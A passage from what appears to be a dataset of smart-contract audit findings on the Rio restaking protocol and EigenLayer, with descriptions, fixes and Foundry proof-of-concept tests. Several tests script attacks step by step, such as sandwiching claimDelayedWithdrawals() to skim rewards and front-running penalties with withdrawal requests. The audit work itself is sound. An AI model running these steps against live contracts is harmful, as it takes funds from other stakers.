= uint256(eigenPodShares).reducePrecisionToGwei();\\n }\\n } else {\\n .\\n }\\n .\\n }\\n```\\n\\nAs observed, the entire EigenPod shares are requested as a withdrawal, which is 64 Ether. However, a user can request a 63 Ether withdrawal before the owner's transaction from the coordinator, which would also trigger a full withdrawal of 64 Ether. In the end, the user would receive 63 Ether, leaving 1 Ether idle in the EigenPod:\\n```\\nfunction queueETHWithdrawalFromOperatorsForUserSettlement(IRioLRTOperatorRegistry operatorRegistry, uint256 amount) internal returns (bytes32 aggregateRoot) {\\n .\\n for (uint256 i = 0; i < length; ++i) {\\n address delegator = operatorDepositDeallocations[i].delegator;\\n\\n -> // Ensure we do not send more than needed to the withdrawal queue. The remaining will stay in the Eigen Pod.\\n uint256 amountToWithdraw = (i == length - 1) ? remainingAmount : operatorDepositDeallocations[i].deposits * ETH_DEPOSIT_SIZE;\\n\\n remainingAmount -= amountToWithdraw;\\n roots[i] = IRioLRTOperatorDelegator(delegator).queueWithdrawalForUserSettlement(BEACON_CHAIN_STRATEGY, amountToWithdraw);\\n }\\n .\\n }\\n```\\n\\nIn such a scenario, the queued amount would be 63 Ether, and 1 Ether would remain idle in the EigenPod. Since the owner's intention was to shut down the validators in the operator for good, that 1 Ether needs to be scraped as well. However, the owner is unable to sweep it due to MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE:\\n```\\nfunction scrapeExcessFullWithdrawalETHFromEigenPod() external {\\n // @review this is 1 ether\\n uint256 ethWithdrawable = eigenPod.withdrawableRestakedExecutionLayerGwei().toWei();\\n // @review this is also 1 ether\\n -> uint256 ethQueuedForWithdrawal = getETHQueuedForWithdrawal();\\n if (ethWithdrawable <= ethQueuedForWithdrawal + MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE) {\\n revert INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH();\\n }\\n _queueWithdrawalForOperatorExitOrScrape(BEACON_CHAIN_STRATEGY, ethWithdrawable - ethQueuedForWithdrawal);\\n }\\n```\\n\\nWhich means that owner has to set the validator caps for the operator again to recover that 1 ether which might not be possible since the owner decided to shutdown the entire validators for the specific operator.\\nAnother scenario from same root cause: 1- There are 64 ether in an operator 2- Someone requests a withdrawal of 50 ether 3- All 64 ether is withdrawn from beacon chain 4- 50 ether sent to the users withdrawal, 14 ether is idle in the EigenPod waiting for someone to call `scrapeExcessFullWithdrawalETHFromEigenPod` 5- An user quickly withdraws 13 ether 6- `withdrawableRestakedExecutionLayerGwei` is 1 ether and `INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH` also 1 ether. Which means the 1 ether can't be re-added to deposit pool until someone withdraws.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorDelegatorTest --match-test test_StakeETHCalledWith0Ether -vv\\n function test_StuckEther() public {\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n address operatorDelegator = reETH.operatorRegistry.getOperatorDetails(operatorId).delegator;\\n\\n uint256 TVL = 64 ether;\\n uint256 WITHDRAWAL_AMOUNT = 63 ether;\\n RioLRTOperatorDelegator delegatorContract = RioLRTOperatorDelegator(payable(operatorDelegator));\\n\\n // Allocate ETH.\\n reETH.coordinator.depositETH{value: TVL - address(reETH.depositPool).balance}();\\n\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n\\n // Verify validator withdrawal credentials.\\n uint40[] memory validatorIndices = verifyCredentialsForValidators(reETH.operatorRegistry, operatorId, 2);\\n\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Withdraw some funds.\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, WITHDRAWAL_AMOUNT);\\n uint256 withdrawalEpoch = reETH.withdrawalQueue.getCurrentEpoch(ETH_ADDRESS);\\n\\n // Skip ahead and rebalance to queue the withdrawal within EigenLayer.\\n skip(reETH.coordinator.rebalanceDelay());\\n\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Settle with withdrawal epoch.\\n IDelegationManager.Withdrawal[] memory withdrawals = new IDelegationManager.Withdrawal[](1);\\n withdrawals[0] = IDelegationManager.Withdrawal({\\n staker: operatorDelegator,\\n delegatedTo: address(1),\\n withdrawer: address(reETH.withdrawalQueue),\\n nonce: 0,\\n startBlock: 1,\\n strategies: BEACON_CHAIN_STRATEGY.toArray(),\\n shares: WITHDRAWAL_AMOUNT.toArray()\\n });\\n reETH.withdrawalQueue.settleEpochFromEigenLayer(ETH_ADDRESS, withdrawalEpoch, withdrawals, new uint256[](1));\\n\\n vm.expectRevert(bytes4(keccak256(\"INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH()\")));\\n delegatorContract.scrapeExcessFullWithdrawalETHFromEigenPod();\\n }\\n```\\nчMake an emergency function which owner can scrape the excess eth regardless of `MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE`чOwner needs to set the caps again to recover the 1 ether. However, the validators are removed for a reason and adding operators again would probably be not intended since it was a shutdown. Hence, I'll label this as medium.ч```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n -A part of ETH rewards can be stolen by sandwiching `claimDelayedWithdrawals()`чmediumчRewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe protocol handles ETH rewards by sending them to the rewards distributor. There are at least 3 flows that end-up sending funds there:\\nWhen the function RioLRTOperatorDelegator::scrapeNonBeaconChainETHFromEigenPod() is called to scrape non beacon chain ETH from an Eigenpod.\\nWhen a validator receives rewards via partial withdrawals after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nWhen a validator exists and has more than 32ETH the excess will be sent as rewards after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nAll of these 3 flows end up queuing a withdrawal to the rewards distributor. After a delay the rewards can claimed by calling the permissionless function EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), this call will instantly increase the TVL of the protocol.\\nAn attacker can take advantage of this to steal a part of the rewards:\\nMint a sensible amount of `LRTTokens` by depositing an accepted asset\\nCall EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), after which the value of the `LRTTokens` just minted will immediately increase.\\nRequest a withdrawal for all the `LRTTokens` via RioLRTCoordinator::requestWithdrawal().\\nPOC\\nChange RioLRTRewardsDistributor::receive() (to side-step a gas limit bug:\\n```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n\\nAdd the following imports to RioLRTOperatorDelegator:\\n```\\nimport {IRioLRTWithdrawalQueue} from 'contracts/interfaces/IRioLRTWithdrawalQueue.sol';\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nTo copy-paste in RioLRTOperatorDelegator.t.sol:\\n```\\nfunction test_stealRewards() public {\\n address alice = makeAddr(\"alice\");\\n address bob = makeAddr(\"bob\");\\n uint256 aliceInitialBalance = 40e18;\\n uint256 bobInitialBalance = 40e18;\\n deal(alice, aliceInitialBalance);\\n deal(bob, bobInitialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n vm.prank(bob);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n //-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: aliceInitialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to \"simulate\" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> A full withdrawal for the validator is processed, 8ETH (40ETH - 32ETH) will be queued as rewards\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Bob, an attacker, does the following:\\n // 1. Deposits 40ETH and receives ~40e18 LRTTokens\\n // 2. Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n // 3. Requests a withdrawal with all of the LRTTokens \\n {\\n //1. Deposits 40ETH and receives ~40e18 LRTTokens\\n vm.startPrank(bob);\\n reETH.coordinator.depositETH{value: bobInitialBalance}();\\n\\n //2. Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n uint256 TVLBefore = reETH.assetRegistry.getTVL();\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); \\n uint256 TVLAfter = reETH.assetRegistry.getTVL();\\n\\n //->TVL increased by 7.2ETH\\n assertEq(TVLAfter - TVLBefore, 7.2e18);\\n\\n //3. Requests a withdrawal with all of the LRTTokens \\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, reETH.token.balanceOf(bob));\\n vm.stopPrank();\\n }\\n \\n //-> Wait and rebalance\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Bob withdraws the funds he requested\\n vm.prank(bob);\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n\\n //-> Bob has stole ~50% of the rewards and has 3.59ETH more than he initially started with\\n assertGt(bob.balance, bobInitialBalance);\\n assertEq(bob.balance - bobInitialBalance, 3599550056000000000);\\n}\\n```\\nчWhen requesting withdrawals via RioLRTCoordinator::requestWithdrawal() don't distribute the rewards received in the current epoch.чRewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), however this requires a bigger investment in funds the higher the protocol TVL.ч```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n -The protocol can't receive rewards because of low gas limits on ETH transfersчmediumчThe hardcoded gas limit of the Asset::transferETH() function, used to transfer ETH in the protocol, is too low and will result unwanted reverts.\\nETH transfers in the protocol are always done via Asset::transferETH(), which performs a low-level call with an hardcoded gas limit of 10_000:\\n```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n\\nThe hardcoded `10_000` gas limit is not high enough for the protocol to be able receive and distribute rewards. Rewards are currently only available for native ETH, an are received by Rio via:\\nPartial withdrawals\\nETH in excess of `32ETH` on full withdrawals\\nThe flow to receive rewards requires two steps:\\nAn initial call to EigenPod::verifyAndProcessWithdrawals(), which queues a withdrawal to the Eigenpod owner: an `RioLRTOperatorDelegator` instance\\nA call to DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe call to DelayedWithdrawalRouter::claimDelayedWithdrawals() triggers the following flow:\\nETH are transferred to the RioLRTOperatorDelegator instance, where the `receive()` function is triggered.\\nThe `receive()` function of RioLRTOperatorDelegator transfers ETH via Asset::transferETH() to the RioLRTRewardDistributor, where another `receive()` function is triggered.\\nThe `receive()` function of RioLRTRewardDistributor transfers ETH via Asset::transferETH() to the `treasury`, the `operatorRewardPool` and the `RioLRTDepositPool`.\\nThe gas is limited at `10_000` in step `2` and is not enough to perform step `3`, making it impossible for the protocol to receive rewards and leaving funds stuck.\\nPOC\\nAdd the following imports to RioLRTOperatorDelegator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nfunction test_outOfGasOnRewards() public {\\n address alice = makeAddr(\"alice\");\\n uint256 initialBalance = 40e18;\\n deal(alice, initialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n //-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: initialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to \"simulate\" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> Process a full withdrawal, 8ETH (40ETH - 32ETH) will be queued withdrawal as \"rewards\"\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Call `claimDelayedWithdrawals` to claim the withdrawal\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); //❌ Reverts for out-of-gas\\n}\\n```\\nчRemove the hardcoded `10_000` gas limit in Asset::transferETH(), at least on ETH transfers where the destination is a protocol controlled contract.чThe protocol is unable to receive rewards and the funds will be stucked.ч```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n -Stakers can avoid validator penaltiesчmediumчStakers can frontrun validators penalties and slashing events with a withdrawal request in order to avoid the loss, this is possible if the deposit pool has enough liquidity available.\\nValidators can lose part of their deposit via penalties or slashing events:\\nIn case of penalties Eigenlayer can be notified of the balance drop via the permissionless function EigenPod::verifyBalanceUpdates().\\nIn case of slashing the validator is forced to exit and Eigenlayer can be notified via the permissionless function EigenPod::verifyAndProcessWithdrawals() because the slashing event is effectively a full withdrawal.\\nAs soon as either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() is called the TVL of the Rio protocol drops instantly. This is because both of the functions update the variable podOwnerShares[podOwner]:\\nEigenPod::verifyBalanceUpdates() will update the variable here\\nEigenPod::verifyAndProcessWithdrawals() will update the variable here\\nThis makes it possible for stakers to:\\nRequest a withdrawal via RioLRTCoordinator::rebalance() for all the `LRTTokens` held.\\nCall either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals().\\nAt this point when RioLRTCoordinator::rebalance() will be called and a withdrawal will be queued that does not include penalties or slashing.\\nIt's possible to withdraw `LRTTokens` while avoiding penalties or slashing up to the amount of liquidity available in the deposit pool.\\nPOC\\nI wrote a POC whose main point is to show that requesting a withdrawal before an instant TVL drop will withdraw the full amount requested without taking the drop into account. The POC doesn't show that EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() actually lowers the TVL because I wasn't able to implement it in the tests.\\nAdd imports to RioLRTCoordinator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nIRioLRTOperatorRegistry.StrategyShareCap[] public emptyStrategyShareCaps;\\nfunction test_avoidInstantPriceDrop() public {\\n //-> Add two operators with 1 validator each\\n uint8[] memory operatorIds = addOperatorDelegators(\\n reETH.operatorRegistry,\\n address(reETH.rewardDistributor),\\n 2,\\n emptyStrategyShareCaps,\\n 1\\n );\\n address operatorAddress0 = address(uint160(1));\\n\\n //-> Deposit ETH so there's 74ETH in the deposit pool\\n uint256 depositAmount = 2*ETH_DEPOSIT_SIZE - address(reETH.depositPool).balance;\\n uint256 amountToWithdraw = 10 ether;\\n reETH.coordinator.depositETH{value: amountToWithdraw + depositAmount}();\\n\\n //-> Stake the 64ETH on the validators, 32ETH each and 10 ETH stay in the deposit pool\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker notices a validator is going receive penalties and immediately requests a withdrawal of 10ETH\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, amountToWithdraw);\\n\\n //-> Validator get some penalties and Eigenlayer notified \\n //IMPORTANT: The following block of code it's a simulation of what would happen if a validator balances gets lowered because of penalties\\n //and `verifyBalanceUpdates()` gets called on Eigenlayer. It uses another bug to achieve an instant loss of TVL.\\n\\n // ~~~Start penalties simulation~~~\\n {\\n //-> Verify validators credentials of the two validators\\n verifyCredentialsForValidators(reETH.operatorRegistry, 1, 1);\\n verifyCredentialsForValidators(reETH.operatorRegistry, 2, 1);\\n\\n //-> Cache current TVL and ETH Balance\\n uint256 TVLBefore = reETH.coordinator.getTVL();\\n\\n //->Operator calls `undelegate()` on Eigenlayer\\n //IMPORTANT: This achieves the same a calling `verifyBalanceUpdates()` on Eigenlayer after a validator suffered penalties,\\n //an instant drop in TVL.\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorIds[0]);\\n vm.prank(operatorAddress0);\\n delegationManager.undelegate(details.delegator);\\n\\n //-> TVL dropped\\n uint256 TVLAfter = reETH.coordinator.getTVL();\\n\\n assertLt(TVLAfter, TVLBefore);\\n }\\n // ~~~End penalties simulation~~~\\n\\n //-> Rebalance gets called\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker receives all of the ETH he withdrew, avoiding the effect of penalties\\n uint256 balanceBefore = address(this).balance;\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n uint256 balanceAfter = address(this).balance;\\n assertEq(balanceAfter - balanceBefore, amountToWithdraw);\\n}\\n```\\nчWhen RioLRTCoordinator::rebalance() is called and penalties or slashing events happened during the epoch being settled, distribute the correct amount of penalties to all the `LRTTokens` withdrawn in the current epoch, including the ones that requested the withdrawal before the drop.чStakers can avoid validator penalties and slashing events if there's enough liquidity in the deposit pool.ч```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n -All operators can have ETH deposits regardless of the cap setted for them leading to miscalculated TVLчmediumчSome operators might not be eligible for using some strategies in the LRT's underlying tokens. However, in default every operator can have ETH deposits which would impact the TVL/Exchange rate of the LRT regardless of they have a cap or not.\\nFirst, let's examine how an operator can have ETH deposit\\nAn operator can have ETH deposits by simply staking in beacon chain, to do so they are not mandatory to call EigenPods \"stake\" function. They can do it separately without calling the EigenPods stake function.\\nAlso, every operator delegator contract can call `verifyWithdrawalCredentials` to increase EigenPod shares and decrease the queued ETH regardless of they are active operator or they have a cap determined for BEACON_CHAIN_STRATEGY.\\nNow, let's look at how the TVL of ETH (BEACON_CHAIN_STRATEGY) is calculated in the AssetRegistry:\\n```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n\\nAs we can see above, regardless of the operators cap the entire active validator counts are looped.\\n```\\nfunction getEigenPodShares() public view returns (int256) {\\n return eigenPodManager.podOwnerShares(address(this));\\n }\\n\\n function getETHQueuedForWithdrawal() public view returns (uint256) {\\n uint256 ethQueuedSlotData;\\n assembly {\\n ethQueuedSlotData := sload(ethQueuedForUserSettlementGwei.slot)\\n }\\n\\n uint64 userSettlementGwei = uint64(ethQueuedSlotData);\\n uint64 operatorExitAndScrapeGwei = uint64(ethQueuedSlotData 64);\\n\\n return (userSettlementGwei + operatorExitAndScrapeGwei).toWei();\\n }\\n\\n function getETHUnderManagement() external view returns (uint256) {\\n int256 aum = getEigenPodShares() + int256(getETHQueuedForWithdrawal());\\n if (aum < 0) return 0;\\n\\n return uint256(aum);\\n }\\n```\\n\\nSince the operator has eigen pod shares, the TVL will account it aswell. However, since the operator is not actively participating on ether deposits (not in the heap order) the withdrawals or deposits to this specific operator is impossible. Hence, the TVL is accounting an operators eigen pod share which the contract assumes that it is not in the heap.\\nTextual PoC: Assume there are 5 operators whereas only 4 of these operators are actively participating in BEACON_CHAIN_STRATEGY which means that 1 operator has no validator caps set hence, it is not in the heap order. However, this operator can still have ether deposits and can verify them. Since the TVL accounting loops over all the operators but not the operators that are actively participating in beacon chain strategy, the TVL calculated will be wrong.чput a check on `verifyWithdrawalCredentials` that is not possible to call the function if the operator is not actively participating in the BEACON_CHAIN_STRATEGY.чMiscalculation of total ether holdings of an LRT. Withdrawals can fail because the calculated ether is not existed in the heap but the TVL says there are ether to withdraw from the LRT.ч```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n -`requestWithdrawal` doesn't estimate accurately the available shares for withdrawalsчmediumчThe `requestWithdrawal` function inaccurately estimates the available shares for withdrawals by including funds stored in the deposit pool into the already deposited EigenLayer shares. This can potentially lead to blocking withdrawals or users receiving less funds for their shares.\\nFor a user to withdraw funds from the protocol, they must first request a withdrawal using the `requestWithdrawal` function, which queues the withdrawal in the current epoch by calling `withdrawalQueue().queueWithdrawal`.\\nTo evaluate the available shares for withdrawal, the function converts the protocol asset balance into shares:\\n```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n\\nThe issue arises from the `getTotalBalanceForAsset` function, which returns the sum of the protocol asset funds held, including assets already deposited into EigenLayer and assets still in the deposit pool:\\n```\\nfunction getTotalBalanceForAsset(\\n address asset\\n) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(\\n getAssetStrategy(asset),\\n sharesHeld\\n );\\n\\n return tokensInRio + tokensInEigenLayer;\\n}\\n```\\n\\nThis causes the calculated `availableShares` to differ from the actual shares held by the protocol because the assets still in the deposit pool shouldn't be converted to shares with the current share price (shares/asset) as they were not deposited into EigenLayer yet.\\nDepending on the current shares price, the function might over or under-estimate the available shares in the protocol. This can potentially result in allowing more queued withdrawals than the available shares in the protocol, leading to blocking withdrawals later on or users receiving less funds for their shares.чThere is no straightforward way to handle this issue as the asset held by the deposit pool can't be converted into shares while they were not deposited into EigenLayer. The code should be reviewed to address this issue.чThe `requestWithdrawal` function inaccurately estimates the available shares for withdrawals, potentially resulting in blocking withdrawals or users receiving less funds for their shares.ч```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n -Slashing penalty is unfairly paid by a subset of users if a deficit is accumulated.чmediumчIf a deficit is accumulated in the EigenPodManager due to slashing when ETH is being withdrawn the slashing payment will be taken from the first cohort to complete a withdrawal.\\nA deficit can happen in `podOwnerShares[podOwner]` in the EigenPodManager in the EigenLayer protocol. This can happen if validators are slashed when ETH is queued for withdrawal.\\nThe issue is that this deficit will be paid for by the next cohort to complete a withdrawal by calling `settleEpochFromEigenLayer()`.\\nIn the following code we can see how `epochWithdrawals.assetsReceived` is calculated based on the amount received from the `delegationManager.completeQueuedWithdrawal` call\\n```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nthe amount received could be 0 if the deficit is larger than the amount queued for this cohort. See following code in `withdrawSharesAsTokens()` EigenPodManager\\n```\\n } else {\\n podOwnerShares[podOwner] += int256(shares);\\n emit PodSharesUpdated(podOwner, 